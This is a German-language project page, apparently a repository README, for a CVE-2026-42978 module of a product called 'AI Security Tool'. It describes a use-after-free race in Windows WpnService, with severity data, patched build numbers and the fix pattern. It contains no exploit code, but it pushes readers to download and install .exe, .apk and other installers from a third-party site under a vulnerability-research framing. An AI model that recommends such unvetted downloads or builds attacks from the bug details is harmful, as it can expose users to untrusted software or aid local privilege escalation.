
CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free- und Race-Condition-PoC-Forschung, Diagnose-Scanner und Sicherheitsaudit-Modul für AI Security Tool.
CVE-2026-42978
Windows Push Notifications-Modul für AI Security Tool
Next-Gen KI-Sicherheits-Ökosystem, Multi-Protokoll-Terminal & autonome Agenten-Suite
Website · Produktdokumentation · Host-Anwendung · Community-Chat
Website-Navigation: Startseite · Updates · Downloads · Module
Produkt: AI Security Tool
Website: zerodayevil.github.io
Dokumentation: https://zerodayevil.github.io/ai-security-tool
Dieses Modul ist ein geprüfter Write-up und ein Safe-Check-Profil für AI Security Tool.
Verwende nur Module, die auf der Projektseite oder im offiziellen Katalog aufgeführt sind. Lade dieses Modul innerhalb der genehmigten Anwendung, gegen Endpunkte, die dir gehören oder für die du eine schriftliche Autorisierung zur Bewertung hast.
Dieses Repository liefert keinen weaponisierten Exploit gegen WpnService. Das Lab unter lab/ ist ein eigenständiger Mock der Klasse des Bugs (TOCTOU / Double-Fetch). Es kommuniziert nicht mit dem echten Push-Notification-Dienst.
Installiere zuerst die Host-Anwendung. Aktiviere dann dieses Modul über Modules → Windows / Local EoP → CVE-2026-42978.
| OS / Plattform | Version | Architektur / Format | Aktualisiert | Status | Download |
|---|---|---|---|---|---|
| Windows | v6.3.20 | x64 Installer (.exe) | 2026-09-08 | Neueste | Download .exe |
| Windows | v6.3.20 | x64 Portable (.tar.gz) | 2026-09-08 | Neueste | Download .tar.gz |
| macOS | v5.3.29 | Apple Silicon (.dmg) | 2026-09-05 | Stabil | Download .dmg |
| Linux | v5.3.27 | Universal x64 (.tar.gz) | 2026-09-01 | Stabil | Download .tar.gz |
| Android | v5.3.27 | ARM64 APK (.apk) | 2026-09-01 | Stabil | Download .apk |
Nur offizielle Quellen:
CVE-2026-42978 ist eine lokale Rechteausweitung in Windows Push Notifications. Microsoft beschreibt den konkurrierenden Zugriff auf eine gemeinsam genutzte Ressource ohne ordnungsgemäße Synchronisierung (CWE-362). Untersuchungen an gepatchter vs. ungepatchter wpncore.dll zeigen eine Use-After-Free-Race in PresentationEndpointFacade während des Plattform-Shutdowns.
WpnService läuft in Session 0 als NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). Toast-, Tile- und Badge-Zustellung laufen darüber. Ein gewonnenes Race gegen diesen Prozess ist ein SYSTEM-Problem auf der lokalen Maschine — kein Remote-Pre-Auth-DC-Bug.
Status: gepatcht am 10. Juni 2026 (Patch Tuesday). Diese Seite ist defensive Forschung.
Es ist nicht CVE-2026-41089 (Netlogon RCE). Andere Komponente, anderes Privilegienmodell, anderes Patch-Datum.
| Feld | Wert |
|---|---|
| CVE | CVE-2026-42978 |
| BDU | BDU:2026-08249 |
| Herstellerhinweis | MSRC — Windows Push Notifications EoP |
| Schweregrad | Hoch · CVSS 3.1 7.8 |
| Schwachstelle | CWE-362 Race Condition · Use-After-Free auf dem Shutdown-Pfad |
| Komponente | Windows Push Notifications · WpnService · wpncore.dll |
| Angriffsvektor | Lokal |
| Erforderliche Privilegien | Niedrig (autorisierter lokaler Benutzer) |
| Benutzerinteraktion | Keine |
| Patch Tuesday | 10. Juni 2026 |
| Modultyp | Research-Write-up + In-App-Safe-Check + Detection-Pack |
Client- und Server-SKUs, die Push Notifications enthalten. Bestätige das genaue KB auf MSRC, bevor du ein Ticket schließt.
| Familie | Hinweise |
|---|---|
| Windows 10 | 1809, 21H2, 22H2 (x86 / x64 / ARM64 je nach Anwendbarkeit) |
| Windows 11 | 23H2, 24H2, 25H2, 26H1 |
| Windows Server | 2016 / 2019 / 2022 / 2025 (Full und Server Core, wo die Komponente existiert) |
Orientierungs-Builds aus öffentlichen Servicing-Notes (immer MSRC erneut prüfen):
| Branch | Indikativer gepatchter Build |
|---|---|
| Windows 11 23H2 | 22631.7219 |
| Windows 11 24H2 | 26100.8655 |
| Windows 11 25H2 | 26200.8655 |
| Windows 11 26H1 | 28000.2269 |
wpncore.dll Beispiel (24H2) | verwundbar 26100.8521 → gepatcht 26100.8655 |
Die Facade umschließt Notification-API-Aufrufe und delegiert an PresentationEndpointImpl. Während des Plattform-Shutdowns wird das NotificationPlatform-Objekt zerstört. Mehrere Facade-Methoden nahmen historisch einen Plattform-Zeiger ohne Shutdown-Flag oder Shared Lock. Gewinnt der Teardown das Race, verwendet der nächste Aufruf einen Dangling Pointer.
Dasselbe Lock-and-Guard-Muster wurde auf 49 PresentationEndpointFacade::*-Methoden angewendet. Die darunterliegenden Implementierungsmethoden blieben unverändert — das Loch saß an der Facade.
wpncore.dll 26100.8521)